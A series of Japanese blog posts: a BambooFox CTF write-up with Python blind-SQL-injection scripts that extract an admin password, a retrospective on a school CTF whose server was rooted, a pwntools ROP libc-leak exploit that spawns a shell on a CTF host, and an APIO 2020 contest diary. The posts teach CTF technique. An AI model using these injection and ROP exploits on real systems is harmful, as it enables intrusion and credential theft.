0. もんだい

BambooFox CTF Web "Yet Another Login Page"

青背景に昔のWindowsのフォームみたいなのが動いているやつです．入力しにくい...

ところで，実はこの問題解けてません（は？）adminのpw当ててログインしたのに "Hello admin ｡:.ﾟヽ(*´∀`)ﾉﾟ.:｡" で終わりはないよなあああああ！！！

折角なので pw 特定に使った Blind SQL Injection に関する知見を残しておこうと思います．解法に関係なかったら悲しすぎる

1. ちょっと調査（激ウマギャグ）

まず，HTMLの要素を見てPOSTの要素名がそれぞれ"username" と "password" である事を確認します（入力しづらいし，Pythonからやりたいだろ）

ここから脆弱性の検査に入ります．まずはSQL Injectionを疑ってUsernameに ' を入れてみると...

Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

はい，SQL Injectionですね間違いない（確信）．なぜSQLi が効く場合Errorが出るかと言うと，例えば

SELECT username FROM users WHERE username='{$_POST['username']}' AND password='{$_POST['password']}'

のようなSQL文の場合，username に ' を入れると username のシングルクォートが閉じてしまい，以下のような文になってしまうからです．

SELECT username FROM users WHERE username=''' AND password=''

usernameの所がシングルクォート3つになっていておかしいですよね．それでErrorが出たという訳です．

2. もうちょっと調査

（基本事項）

• usernameにadminを入れると，"Wrong password for admin, login from **.***.***.***." と返ってくる．
• admin以外を入れると，"User not found!" と返ってくる．
• 何をしても上の2つとError以外のresponseは返ってこない
• DB上も要素名はusernameとpasswordらしい

ところで，SQLi が効く時に使える魔法の言葉を知っていますか？せーの！

これは，usernameのシングルクォートを閉じた上で1=1(True)とのORを取る事で必ず真にしてログインできるようにする魔法の言葉です． すごいですね！さっそく入れてみましょう

Wrong password for admin, login from **.***.***.***.

SQLクエリで返ってきたpwとPOSTのpwが一致してないとWrongって出す仕様なのか，pwを特定しない事には入れなさそうな感じがあります．

3. adminのpwが分からない？ｗフッフッフッw

レスポンスが限られている状態でもどうにかしてpwを特定したい時使えるテクがあります．

その名も，"Blind SQL Injection" ！

はかせ「ワシが説明しよう」
こどもたち「はかせー！！」
はかせ「Blind SQL Injectionとは，SQLiで意図的にレスポンスを変化させる事で，pwなどの情報を抜き取るテクニックじゃ．当たり前じゃが，他人のサーバに仕掛けたらダメじゃぞ．でないとワシのように ... (ｶﾞﾁｬ 『警察だ！不正アクセス容疑で...』」
こどもたち「はかせー！！」

それでは，Blind SQLi を使ってadminのpwを抜き取ってやりましょう！！

3-1. Blind SQL Injectionの適用

usernameの中身によるレスポンスの違いを見てみましょう．

1. ' AND 0 OR username='admin' --
2. ' AND 0 OR username='admin' AND 0 --

前者は "Wrong password for admin, login from **.***.***.***." , 後者は "User not found!" が返ってきました．

これは，前者は一応SQL文の実行結果としてusername='admin'が返ってきているのに対して，後者はAND 0を取られることによって何も返ってこず，結果的にUser not foundになっていると考えられます．

よって，ANDの後に True/False となる文を入れる事で，意図的にレスポンスを変化させられる事が分かりました！

3-2. pwの長さが分からない？ｗフッフッフッｗ

まずは，pwの長さを特定しましょう．MySQLにはLENGTHという文字列の長さを返してくれる便利な関数があります．これを使うと，例えば

' AND 0 OR (username='admin' AND length(password)>=0) --

ならWrong password，

' AND 0 OR (username='admin' AND length(password)>=1000) --

ならUser not foundが返ってきます．ところで，pwの長さって単調性がありますよね..？

そこで，二分探索をします．つまり，

' AND 0 OR (username='admin' AND length(password)>={mid}) --

でWrong passwordならpwの長さは mid 以上，User not foundなら mid 未満といった具合です．

import requests

url="http://chall.ctf.bamboofox.tw:9527/login"

def check(data):
    res=requests.post(url,data)
    if "Wrong password for admin" in res.text:
        return True
    return False

ok,ng=0,100
while ng-ok>1:
    mid=(ok+ng)//2
    form={
        "username":f"' AND 0 OR username='admin' AND length(password)>={mid} --",
        "password":""
    }
    if check(form):
        ok=mid
    else :
        ng=mid
print(f"[+] LENGTH : {ok}")

$ python3 sql.py
[+] LENGTH : 43

結果，pwの長さは43である事が分かりました．

3-3. pwの i 文字目が何か分からない？ｗフッフッフッｗ

もう1つ便利な関数として，SUBSTRがあります．SUBSTR(str , i , j) = str の i 文字目から j 文字切り取った文字列を返します．文字番号は1-indexed なので注意です．

よって，5 文字目が 'A' 以上か判定するには次のような文字列を挿入すれば良いです．

' AND 0 OR username='admin' AND SUBSTR(password,5,1)>='A' --

こちらも単調性があるので，二分探索ができます．

これを1文字目から順番にやって行く事で，pwを特定できます．

import requests

url="http://chall.ctf.bamboofox.tw:9527/login"

def check(data):
    res=requests.post(url,data)
    if "Wrong password for admin" in res.text:
        return True
    return False

ok,ng=0,100
while ng-ok>1:
    mid=(ok+ng)//2
    form={
        "username":f"' AND 0 OR username='admin' AND length(password)>={mid} --",
        "password":""
    }
    if check(form):
        ok=mid
    else :
        ng=mid
print(f"[+] LENGTH : {ok}")
length=ok

pw=""
for i in range(length):
    ok,ng=0,128
    while ng-ok>1:
        mid=(ok+ng)//2
        form={
            "username":f"' AND 0 OR username='admin' AND SUBSTR(password,{i+1},1)>=CHAR({mid}) --",
            "password":""
        }
        if check(form):
            ok=mid
        else :
            ng=mid
    pw+=chr(ok)
    print(f"[+] {pw}")

$ python3 sql.py
[+] LENGTH : 43
[+] w
[+] w1
[+] w1M
[+] w1ME
[+] w1MEo
...
[+] w1MEoJZVmhu2u7GWN6V4SJRTUrLQxDJK9MBCWezdt
[+] w1MEoJZVmhu2u7GWN6V4SJRTUrLQxDJK9MBCWezdtO
[+] w1MEoJZVmhu2u7GWN6V4SJRTUrLQxDJK9MBCWezdtOo

より，adminのpwを "w1MEoJZVmhu2u7GWN6V4SJRTUrLQxDJK9MBCWezdtOo" と特定する事ができました．やったね！

4. to be continued ...

pw特定したのに解けませんでした．チックショー！！！

1. 概要

10/30 〜 11/1 に筑駒文化祭2020「彩雲」に合わせて Paken CTF 2020を開催しました。

158人110チームからの参加、うち96チームが得点、合計2118件の提出という事で予想以上に参加して頂いてとても嬉しいです。

コンセプトはCTFをやった事がない競プロerなどに楽しんでもらう事でしたが、楽しんでもらえたでしょうか？

運営は中3の私 defineと高1の kenkenken2004 氏、Writerは他にThistle, capra314cabra, autumn_eel, aspiです。サーバーの管理は私が担当しました。

作問は私がpwn & kyoproをメインに、kenkenken2004氏が Crypto, Forensics, OSINTメインという感じです。

私自身CTF初心者でAWSサーバーを建てた事もなく、色々な文献を漁りながら手探りでやっていました。知識不足で色々と重大な事故を起こしかねないようなインシデントも起こしてしまったので、自戒の念も込めて運営記を書こうと思います。

2. CTF開催の経緯

昨年までパ研は競プロ傾倒だったので、今年からはアルゴリズム班・セキュリティ班・CG班などに分かれて活動しています。その1つであるセキュリティ班で今回CTF開催をするに至りました。そこまでの経緯を簡単に紹介します。

2.1. 9/29

文化祭でPaken CTF開催してみない？という流れになりました。この時点では、pwn はサーバーに侵入されたら怖いからやめよーみたいな感じでやる予定はありませんでした（伏線）。

2.2. 10/7

開催するCTFをPaken CTFと名付けて、具体的にスケジュールなどを作成しました（なお、全く守れなかった）。技術的には、AWSで開催しようくらいまでは決まっていました。

ここら辺からちょっとずつ作問を始めて行きました。

2.3. 10/11

AWSのEC2を建てるにはクレジットカードが必要な事に気づきました。そこで、顧問の先生にクレジットカードでサーバー費の立て替えを依頼しました。

2.4. 10/21

本来ならとっくにサーバーを建て終わってる予定だったんですが、クレジットカードの話が難航してサーバーを全く建てられておらず、サイトに問題と解説を載せるだけになる可能性も示唆されました。

2.5. 10/24

なんとか先生にカードを入れて頂き、ここからサーバー作業スタート。

AWSでCTFの大会を開催するまでの道のり - アオカケスの鳥かご に沿ってどうにかサーバーを建てました。極度感謝！

というか、ここからよく本番に間に合ったなって感じですね。

2.6. 10/27

xinetd と chroot を使えばサーバープログラムを安全に、簡単に動かせる（伏線その2）事を知りpwnなどのインタラクティブ系の作問を開始しました。遅すぎ...

chrootとxinetdで脆弱なプログラムを動かす - mrtc0.log

2.7. 10/30

当日、文化祭で出かける直前になってclarをFLAGと同じフォームで提出はヤバイと気づきDiscordサーバーを建てました（英断）。

3. pwnの運用

pwnの運用について軽く自分のやった方法を紹介します。良いか悪いかは置いといて。

プログラムと同じ場所にflag.txt , /lib, /lib64と必要な /binを置いてchrootするのをxinetdでやって運用しました。これ、libのコピーで1問ごとに1GB弱食うのでもうちょっといい方法無いですかね？Docker何も分からん

4. 事案集

今回私は色々やらかしてるんですが、その中でもトップ3を紹介します。

4.1. スタート時間を間違える ヤバイ度 ☆☆☆☆★

文化祭のスタートは9:00だと思ってCTFもそれに合わせたんですが、実際は9:30でした。

これは大して問題ではありませんでした。

4.2. サーバーを落とす ヤバイ度 ☆☆★★★

10/31 15:45〜16:10 くらいまでサーバーを落としてしまいました。

落ちる前からだんだんSSHでの操作が重くなっていたのは分かっていたんですが、pwnの接続テストをしたら全く動かなくなりました。

後述の4.3の対応中で、SSHも繋がらない状態になったのでかなり焦りました。結局、EC2のインスタンスを再起動したら直りました。めでたしめでたし。

4.3. サーバーのrootを取られる ヤバイ度 ★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★

はい、サーバー乗っ取られました（伏線回収）。これ乗っ取った人がいい人だったので取ったどー（意訳）って親切に教えてくれたんですが、ヤバイ人だったら完全にサーバー壊されてましたね。

Discordの参加者サーバーで「スコアサーバーの管理者に連絡がある」という事で何かを察し、恐る恐るDMを見ると「root取ったどー（意訳）」だったのでマジで心臓止まるかと思いました。

pwnの"libc"という問題でシェル取った後悪さができないようにbinの中身を疑似シェルだけにしてたんですが、なぜかchrootできたっぽいんですよね。なんでだろ？しかも脆弱性のあるプログラムを動かすのに使ったchrootはプログラムもrootで動くので、chrootもう1回するとchroot抜けられるという... 結局、プログラムを実行前にsu ctf(一般ユーザー）して解決しました。

root取られた事でFLAGも全て見れる状態になったようで、スコアサーバーと問題サーバーは変えた方が良いとアドバイスを頂きました。ちなみに、root取っても普通に問題は解かれていたそうです。

執行部内で話したら爆笑してましたが、これで事故起こしてたら笑い事じゃ済まないんですよね。 皆さん、権限不備には気をつけましょう！！

5. 良かった所

AWSなどサーバーに関する知識を色々と学べた事、何よりもCTFを実際に開催する事ができたのは非常に良かったと思っています。

あと、直前ではあったんですがpwnなどのインタラクティブ系の問題を出せたのも大きかったです。元々なしの予定だったので...。pwnのないCTFは面白くないですしね！

6. 反省点

これはアンケートで多く意見を頂いた事なんですが、guess問が多すぎるという事です。これは主にCryptoの話なんですが、実は私kenkenken2004氏作問の問題をほとんど解いていませんでした。解いてないというか解けないという感じなんですが。全完されて焦ってレビューなしでバンバン問題を上げてしまった事で、かえってクオリティを下げる結果となってしまったかなという感じです。逆に、pwn問やkyopro問は私以外ほとんど解いてない状況だったのでこっちも然りです。

あと、サーバーのセキュリティがガバガバ過ぎた事は猛省です。セキュリティの知識が欠如している状態でパブリックなサーバー、しかもpwnサーバーを運用するのはかなり危険。

「疑似シェルしか立ち上げられないし、rootで動かしてもヨシ！」は本当にダメ。

今回、身を持ってセキュリティの重要性を実感する結果となりました。今度また開催する時があれば、今回の反省を活かしたいと思います。

7. 感想

なんやかんやありましたが、全体的には大きな事故なく上手く行って良かったと思います。これを機に、CTFに興味を持って頂けたらこれ以上嬉しいことはありません。

文化祭も終わったのでもうJOI精進期間ですね。春合宿が終わったらまたCTF再開しようと思います。

0. はじめに

Buffer Over Flow 系のpwn やってて、こんな事を考えた事はありますか？僕はあります。

ヨシ、gdb で入力からリターンアドレスまでのオフセットを特定！後は system('/bin/sh') 起動するだｋ... libcが配られてなあァァい！！

そうです、ほとんどの問題でASLRが有効となり、猫も杓子も libc_base の時代に libc があるかは死活問題。しかし、逆に言えば libc_base と libc さえ特定してしまえば後は何とかなります（要出典）。

というわけで、 libc を特定する一般的なテクについての紹介です（かなり有名ではある）。

問題は、Dark CTF の roprop です。

1. 入力からリターンアドレスまでのオフセットを取得しよう

はい、Buffer Over Flow系の問題の基本ですね。gdb-peda は必ず入れておきましょう。

pattern_create [n] → 入力 → patto [rspの値 (32bitならeip) ] の流れです。

はい、ここでは88文字と分かりました。

2. objdumpで流れを把握しよう

objdump -d -M intel [ファイル名] です。-M intel は Intel 記法にするおまじないです。

大体 puts → gets 以外に重要なものはなさそうです。

3. ROP で puts@GOT の中身を取得しよう

GOTアドレスの先には、その関数の本当の場所のアドレスが入っており、puts や system などの libc 系の関数の場合、それは libc_base + libc内の関数アドレス になります。

要は、取り敢えず puts のアドレスを取得しようという事です。

Buffer Over Flowでリターンアドレスの書き換えができるので、puts(puts@GOT) を呼び出せば puts@GOT の中身を知る事ができます！

64bit なので、Stack align で ret を挟むのを忘れずに（おまじない）

関数のアドレスを吐かせる時には、必ずローカルではなく本番環境で行って下さい。ローカルのlibcを特定しても何も意味がありません。

from pwn import *

elf=ELF("./roprop")
p=remote("pwn.darkarmy.xyz",5002)
context(os="linux",arch="amd64")

payload=b"A"*88

rop=ROP(elf)
rop.raw(rop.find_gadget(['ret']))
rop.puts(elf.got['puts'])

log.info(rop.dump())

payload+=rop.chain()
p.sendlineafter(b"19's.\n\n",payload)

puts_addr=u64(p.recvline()[:8].strip().ljust(8,b'\x00'))
log.info(hex(puts_addr))

はい、これで puts@GOT の中身を知る事ができました。

4. libc Database で libc , libc_base を特定しよう

世の中便利なもので、先程のputsのアドレスだけで libc を大体特定する事ができます。2択くらいになる事はありますが、まぁそれくらいは頑張りましょう...

libc database search

今回は libc6_2.27-3ubuntu1.2_amd64 と特定できたので、これをダウンロードします。

libc が分かった所で、libc_base を特定する事ができます！関数のアドレスは libc_base + libc内の関数アドレスな事を思い出して下さい。

from pwn import *

elf=ELF("./roprop")
p=remote("pwn.darkarmy.xyz",5002)
context(os="linux",arch="amd64")

payload=b"A"*88

rop=ROP(elf)
rop.raw(rop.find_gadget(['ret']))
rop.puts(elf.got['puts'])

log.info(rop.dump())

payload+=rop.chain()
p.sendlineafter(b"19's.\n\n",payload)

puts_addr=u64(p.recvline()[:8].strip().ljust(8,b'\x00'))
log.info(hex(puts_addr))

libc=ELF("./libc6_2.27-3ubuntu1.2_amd64.so")

libc.address=puts_addr-libc.symbols['puts']
log.success(hex(libc.address))

libc_base は 下3桁が0な事が知られているので、ちゃんと特定できている事が分かります。なお、ASLR が有効なのでlibc_base は毎回変化する事に注意しましょう。

5. いざ、system('/bin/sh')

さて、後は libc_base を利用して system('/bin/sh') を呼び出すだけです。あれ、main 関数終わったんじゃ...と思った人もいるかもしれませんが、puts を呼び出す事ができるようにmain関数を呼び出す事もできます！

というわけで、2周目の main 関数の後で system('/bin/sh') を呼び出します。

from pwn import *

elf=ELF("./roprop")
#p=process("./roprop")
p=remote("pwn.darkarmy.xyz",5002)
context(os="linux",arch="amd64")

# 1周目

payload=b"A"*88
rop=ROP(elf)
rop.raw(rop.find_gadget(['ret']))
rop.puts(elf.got['puts'])
rop.main()
log.info(rop.dump())

payload+=rop.chain()
p.sendlineafter(b"19's.\n\n",payload)

puts_addr=u64(p.recvline()[:8].strip().ljust(8,b'\x00'))
log.info(hex(puts_addr))

libc=ELF("./libc6_2.27-3ubuntu1.2_amd64.so")

libc.address=puts_addr-libc.symbols['puts']
log.success(hex(libc.address))

# 2周目

rop2=ROP(libc)
payload=b"A"*88
rop2.system(next(libc.search(b"/bin/sh\x00")))
log.info(rop2.dump())
payload+=rop2.chain()

p.sendlineafter(b"19's.\n\n",payload)

p.interactive()

というわけで、無事に シェルを起動できました。やったね！

pwntools のROP機能 を使うと、このように良くも悪くも関数呼び出し系のルールがうろ覚えでも何とかなってしまいます。なので、多分最初の内はpwntools の ROP 機能は使わない方がいいかも...

もっと最初で、pwn始めたばっかり！ってレベルの時は、そもそもpwntoolsを使うのもあんまり良くない気がします。

BOF問で、SSP & PIE 無効 & 何らかの入力と出力がある問題は広く使えると思うので、覚えておくといいかもしれません！

1. 雑

8/16 10:00 ~ 15:00 (JST) ，APIO 2020に参加しました．今年は残念ながらオンライン開催でしたが，長時間コンテストならではの楽しみを味わうことができました！

普通に5時間参加して疲れたんですが，春合宿の時はこれを4日連続でやってたのか... まぁ，実際 5 時間やってみると思った以上にあっという間に終わっちゃうものですよね．

時間配分に完全に失敗した感じがあるんですが，まぁそれでも 1 完できて良かった（？） でもAPIOの方が春合宿よりだいぶ簡単目ではあると思います．

APIO 2017 Virtual の時に，VSCodeで複数ファイルデバッグのやり方を確認しておいたのはかなり役立ちました．JOIの時使えるのかなぁ？

2. 全体

（提出履歴）

（得点）

• [A] Painting Walls 100点 (小課題 1 ~ 5)
• [B] Swapping Cities 50点 (小課題 1 ~ 4)
• [C] Fun Tour †0点†

計 150 点でした．ちーん

まだ日本順位出てないので分かりませんが，9位〜11位くらいじゃないかと思います．春合宿よりは全然マシ．

3. コンテスト実況（唐突）

それでは，define 選手のコンテスト中のムーブを実況しようと思います． 実況は私 define が，解説はこちらの define が担当します．よろしくお願いしま〜す（茶番開始）

主観と客観が入り混じって変になってる所あるけど許して下さい

※所々真面目な話をしていますが，ほぼ茶番ですのでご注意下さい

3.0 開始前

まずはラムネをティッシュの上におき，机の上に置きました．競技時間中にサッと食べるためでしょうか． あれ，これは春合宿用に買ったやつでは？そうです，春合宿中は競技会場内に持ち込めなかったので 2 袋買ったのに結局食べなかったのでしたね．糖分大事．

そうこうしている内に残り1分です．本選，春合宿の開始直前と同じ緊張に襲われています．

刻一刻と迫る時間の前に，人間は何と無力な事でしょう！まるで課題の締切

3.1 開始直後 〜 1時間

3.1.1 誤った計算量見積もり

まずはいつも通り A 問題からです． A 問題は簡単枠の可能性が割とあるため，慎重に見極めないと満点を逃すなんて事も起きかねません． ちょっと実験をしながら，10 分ちょっとで問題の意図を理解しました．

「なるほど，各色を好む作業員は最大でも \(650\) 人程度だから，各領域を好む作業員の合計は高々 \(650 \times 10^{5} \) 程度って事か〜．1.5 秒だし log はつけられなさそう...」

それにしても，問題文作成者は，なぜ \(f(k)^{2} \leq 4 \times 10^{5}\) などという表記をしたのでしょうか？かなり不自然に思えます．

「各領域で \(1,2,3,0,1, \cdots \) みたいになっていればそこを \(M\) ずつ指示を出していけるのか． それぞれの作業員は連続する区間で高々 1 回しか使われないから，自分の含まれる区間の右端の最大値を持っておけば貪欲に決められそう！」

「log 付けられないけど，unordered_set使えば間に合うやろ！笑」

簡単枠であると確信し，取り敢えず解法を実装します．

#include<bits/stdc++.h>
#include "paint.h"
using namespace std;
#define rep(i,n) for(int i=0;i<n;i++)

unordered_set<int>st[100005];
int mx[100005];
int minimumInstructions(int N, int M, int K, vector<int> C,vector<int> A, vector<vector<int>> B) {
    rep(i,N){
        mx[i]=i;
        rep(j,M){
            for(int k:B[j])if(C[i]==k)st[i].insert(j);
        }
    }
    rep(i,N){
        for(int j:st[i]){
            int worker=j,cur=i+1;
            while(cur<N&&st[cur].find((worker+1)%M)!=st[cur].end()){
                (worker+=1)%=M;
                st[cur].erase(st[cur].find(worker));
                cur++;
            }
            if(cur<i+M)continue;
            for(int k=cur-1;k>=i;k--)mx[k]=max(mx[k],cur);
        }
    }
    int now=0,ans=0;
    while(now<N){
        if(now+M<=mx[now]){
            ans++;now+=M;
        }else if(mx[now]==now)return -1;
        else {
            ans++;now=mx[now];
        }
    }
    return ans;
}

【結果】

TLE (28pts)

普通に考えて，そもそも

rep(i,N){
    mx[i]=i;
    rep(j,M){
        for(int k:B[j])if(C[i]==k)st[i].insert(j);
    }
}

の時点で相当ヤバイと思うんですが何故気づかないのでしょうか？

いい加減気づいてくれ...

3.1.2 重大なバグ

define 選手，ようやく気が付きました．しかし，今度は不幸にも別のバグを埋めてしまいます．

mx[i]=i;

の部分を忘れていたのです．そのため，以下のコードで -1 を返す事なく 0 に戻ってしまい無限ループが引き起こされて小さいケースでもTLE，見事0点．

int now=0,ans=0;
while(now<N){
    if(now+M<=mx[now]){
        ans++;now+=M;
    }else if(mx[now]==now)return -1;
    else {
        ans++;now=mx[now];
    }
}

このバグは暫く気づく事ができず，コンテスト最大の敗因と言っても過言ではないのではないでしょうか．

3.2 開始 1 時間 〜 2 時間

3.2.1 試行錯誤

define 選手，前述のバグによって試行錯誤を繰り返しています．ジャッジがおかしいのでは？と思いもう一度提出しても結果は変わらず． まごまごしている内に，時間配分の目安である 1時間半を超えてしまいます．明らかに簡単枠にも関わらず，未だ 28 点しか取れていません．

とそこで，血迷った define 選手，間違えてラムネを置いたティッシュを引き抜いた〜！！ラムネ，机の上に産卵！頭大丈夫か？？

しかしそんな事で時間を取る訳には行きません．取り敢えずラムネをまとめてから，頭のリフレッシュも兼ねて他の問題を見ます． まずは B 問題．余程パニックなのでしょうか，小課題 1 を見て次数 2 以下は全てパスグラフだと錯覚し全て -1 を返すようにするも，当然 WA ！

C 問題を見ても何も分からず，やはり A 問題への未練から集中できていない模様．

A 問題にまた戻るも，未だに前述のバグに気づいていません．

3.3 開始 2 時間 〜 3時間

3.3.1 バグへの気づき

ついにバグに気が付きました！この 1 時間は何だったのか，しかし今となっては時間を巻き戻す事はできません． せめて満点を取らないと挽回は厳しいでしょう．

取り敢えずbool 型で管理するやつを実装し，小課題 2 〜 4 の51点を獲得です．

#include<bits/stdc++.h>
#include "paint.h"
using namespace std;
#define rep(i,n) for(int i=0;i<n;i++)

bool ok[20005][2005];
int mx[100005];
vector<int>oklist[100005];
int minimumInstructions(int N, int M, int K, vector<int> C,vector<int> A, vector<vector<int>> B) {
    rep(i,M){
        for(int j:B[i])oklist[j].push_back(i);
    }
    rep(i,N){
        mx[i]=i;
        for(int j:oklist[C[i]])ok[i][j]=true;
    }
    rep(i,N){
        rep(j,M){
            if(!ok[i][j])continue;
            int worker=j,cur=i+1;
            while(cur<N&&ok[cur][((worker+1)%M)]){
                (worker+=1)%=M;
                ok[cur][worker]=false;
                cur++;
            }
            if(cur<i+M)continue;
            for(int k=cur-1;k>=i;k--)mx[k]=max(mx[k],cur);
        }
    }
    int now=0,ans=0;
    while(now<N){
        if(now+M<=mx[now]){
            ans++;now+=M;
        }else if(mx[now]==now)return -1;
        else {
            ans++;now=mx[now];
        }
    }
    return ans;
}

3.3.2 そして満点解法へ

さて，後は区間の管理を高速化するのみです．

ここで，\(0,1,2,0 \dots \) を index の分だけ差し引けば同じ数になって管理しやすくなる事に気が付きました． 気づくのが遅すぎる，もはや致命的ですがこのチャンスを逃すわけには行きません．

早速実装するも，WA．重大なバグを埋め込んでいるにも関わらず，なぜか小課題 1 が取れました．

#include<bits/stdc++.h>
#include "paint.h"
using namespace std;
#define rep(i,n) for(int i=0;i<n;i++)

vector<int>st[100005];
int mx[100005];
vector<int>oklist[100005];
int start[100005],en[100005];
int minimumInstructions(int N, int M, int K, vector<int> C,vector<int> A, vector<vector<int>> B) {
    rep(i,M){
        for(int j:B[i])oklist[j].push_back(i);
    }
    int ad=(100000+M-1)/M*M;
    rep(i,N){
        mx[i]=i;
        for(int j:oklist[C[i]]){
            st[i].emplace_back((j-i+ad)%M);
        }
    }
    rep(i,M){
        start[i]=-2;en[i]=-2;
    }
    rep(i,N){
        for(int j:st[i]){
            if(en[j]==i-1)en[j]++;
            else {
                for(int k=max(0,start[j]);k<=en[j];k++)mx[k]=max(mx[k],en[j]+1);
                start[j]=i;en[j]=i;
            }
        }
    }
    rep(i,M){
        if(en[i]==N-1){
            for(int j=start[i];j<N;j++)mx[j]=N;
        }
    }
    int now=0,ans=0;
    while(now<N){
        if(now+M<=mx[now]){
            ans++;now+=M;
        }else if(mx[now]==now)return -1;
        else {
            ans++;now=mx[now];
        }
    }
    return ans;
}

適当に以下のように場合分けをしましたが，これは実は意味がありません．途中で終わっている場合を無視しているからです．

rep(i,M){
    if(en[i]==N-1){
        for(int j=start[i];j<N;j++)mx[j]=N;
    }
}

そこでそれを直すも，WA(0pts)． サンプル 2 が間違っている事に気が付きデバッグをすると，連続する区間が \(M\) 未満の場合も処理を行っているのが原因でした．

それを直し，提出．13:00:38 の提出で，見事ACを獲得！

#include<bits/stdc++.h>
#include "paint.h"
using namespace std;
#define rep(i,n) for(int i=0;i<n;i++)

vector<int>st[100005];
int mx[100005];
vector<int>oklist[100005];
int start[100005],en[100005];
int minimumInstructions(int N, int M, int K, vector<int> C,vector<int> A, vector<vector<int>> B) {
    rep(i,M){
        for(int j:B[i])oklist[j].push_back(i);
    }
    int ad=(100000+M-1)/M*M;
    rep(i,N){
        mx[i]=i;
        for(int j:oklist[C[i]]){
            st[i].emplace_back((j-i+ad)%M);
        }
    }
    rep(i,M){
        start[i]=-2;en[i]=-2;
    }
    rep(i,N){
        for(int j:st[i]){
            if(en[j]==i-1)en[j]++;
            else {
                if(en[j]-start[j]+1>=M){
                    for(int k=max(0,start[j]);k<=en[j];k++)mx[k]=max(mx[k],en[j]+1);
                }
                start[j]=i;en[j]=i;
            }
        }
    }
    rep(i,M){
        if(en[i]-start[i]+1>=M){
            for(int j=max(0,start[i]);j<=en[i];j++)mx[j]=max(mx[j],en[i]+1);
        }
    }
    int now=0,ans=0;
    while(now<N){
        if(now+M<=mx[now]){
            ans++;now+=M;
        }else if(mx[now]==now)return -1;
        else {
            ans++;now=mx[now];
        }
    }
    return ans;
}

3.4 開始 3 時間 〜 4 時間

3.4.1 小課題 1

ACして喜ぶのも束の間，時間配分を盛大に失敗している事に気づき絶望．残り時間は僅か 2 時間です． さぁ define 選手，未だに A 問題しか正の得点を得ていない，流石に 1 完 のみじゃ代表は厳しいぞ！

先程「次数 2 以下はパスグラフ」という盛大な嘘解法を実装した define 選手，図を書いたらサイクルグラフの場合も 次数が 2 以下を満たす事に気が付きました．1 完して頭に余裕が出来たのでしょうか，しかし余裕ぶっこいてる場合ではありません． 取り敢えず 6 点を獲得．

#include<bits/stdc++.h>
using namespace std;
#include "swap.h"
#define rep(i,n) for(int i=0;i<n;i++)

int ans;
void init(int N, int M,vector<int> U, vector<int> V, vector<int> W) {
    rep(i,M){
        ans=max(ans,W[i]);
    }
    if(M==N-1)ans=-1;
}

int getMinimumFuelCapacity(int X, int Y) {
    return ans;
}

3.4.2 小課題 2

「\(N \leq 3\) の場合は明らかにアウトで，\(X = 0\) の場合は \(Y\) とのやつ以外に余分な辺を 2 本， それ以外の場合は余分な辺を 1 本取れば大丈夫そう〜」

さて，現在 13 点です．

#include<bits/stdc++.h>
using namespace std;
#include "swap.h"
#define rep(i,n) for(int i=0;i<n;i++)

int ans;
vector<int>memo;
vector<int>idx;
int nn;
multiset<int>st;
void init(int N, int M,vector<int> U, vector<int> V, vector<int> W) {
    idx.resize(N);
    nn=N;
    memo=W;
    rep(i,M){
        idx[V[i]]=i;
        st.insert(W[i]);
    }
}

int getMinimumFuelCapacity(int X, int Y) {
    if(nn<4)return -1;
    if(X==0){
        st.erase(st.find(memo[idx[Y]]));
        auto it=st.begin();it++;
        int ans=max(*it,memo[idx[Y]]);
        st.insert(memo[idx[Y]]);
        return ans;
    }else {
        st.erase(st.find(memo[idx[X]]));
        st.erase(st.find(memo[idx[Y]]));
        int ans=max({*st.begin(),memo[idx[X]],memo[idx[Y]]});
        st.insert(memo[idx[X]]);
        st.insert(memo[idx[Y]]);
        return ans;
    }
}

3.4.3 小課題 3 , 4

「小課題 3 はサイズが小さいので辺を小さい順に追加して行く事が可能だなぁ．閉路がある（辺の本数が頂点数以上）か，パスグラフではなくなった(次数の最大値が3以上）時点でOKだよね．これUnionFindでできるじゃん！」

UnionFindをちょっと改造して提出したら予想以上に点数が高い！これは...？

なんと，小課題 4 も取れています！（ﾄﾞﾝﾄﾞｺﾄﾞﾝﾄﾞｺ)

#include<bits/stdc++.h>
using namespace std;
#include "swap.h"
#define rep(i,n) for(int i=0;i<n;i++)
#define all(v) v.begin(),v.end()

struct UnionFind{
    vector<int>par,size,edges,mx;
    int find(int x){
        return (par[x]==x?x:par[x]=find(par[x]));
    }
    void merge(int x,int y){
        x=find(x);y=find(y);
        if(x==y){
            edges[x]++;
            return;
        }
        if(size[x]<size[y]){
            par[x]=y;
            size[y]+=size[x];
            edges[y]+=edges[x]+1;
            mx[y]=max(mx[x],mx[y]);
        }else {
            par[y]=x;
            size[x]+=size[y];
            edges[x]+=edges[y]+1;
            mx[x]=max(mx[x],mx[y]);
        }
    }
    bool same(int x,int y){
        return find(x)==find(y);
    }
    UnionFind(int x){
        rep(i,x){
            par.push_back(i);size.push_back(1);
            edges.push_back(0);mx.push_back(0);
        }
    }
};

int n,m;
struct S{
    int from,to,weight;
    bool operator<(S e){
        return weight<e.weight;
    }
};
vector<S>edge;
void init(int N, int M,vector<int> U, vector<int> V, vector<int> W) {
    n=N;m=M;
    rep(i,M)edge.push_back({U[i],V[i],W[i]});
    sort(all(edge));
}

vector<int>num;
int getMinimumFuelCapacity(int X, int Y) {
    num.assign(n,0);
    UnionFind uf(n);
    for(S e:edge){
        num[e.from]++;
        num[e.to]++;
        uf.mx[uf.find(e.from)]=max(uf.mx[uf.find(e.from)],num[e.from]);
        uf.mx[uf.find(e.to)]=max(uf.mx[uf.find(e.to)],num[e.to]);
        uf.merge(e.from,e.to);
        if(uf.same(X,Y)){
            int siz=uf.size[uf.find(X)];
            int ed=uf.edges[uf.find(X)];
            int mx=uf.mx[uf.find(X)];
            if(siz-1!=ed||mx>2)return e.weight;
        }
    }
    return -1;
}

これで小課題 1 〜 4 を獲得し，B 問題で 50 点を得ました．

実は小課題 5 の解法も分かってはいたものの，残り 1 時間しかなかった上に実装が重そうだったのでパス．

3.5 開始 4 時間 〜 5 時間

3.5.1 嘘解法，再び そして競技終了

残り僅か 1 時間，何としてでも C 問題で 正の点数を取りたい所です．

「えー，グラフが与えられても順列の構築って難しくない？？？」

取り敢えずクエリを飛ばす必要のない小課題 3 に目を向け，適当な嘘解法を実装するも，当然 WA． 色々直す内に，無理そうな気がするもののやはりこの 21 点は取っておきたい所です．

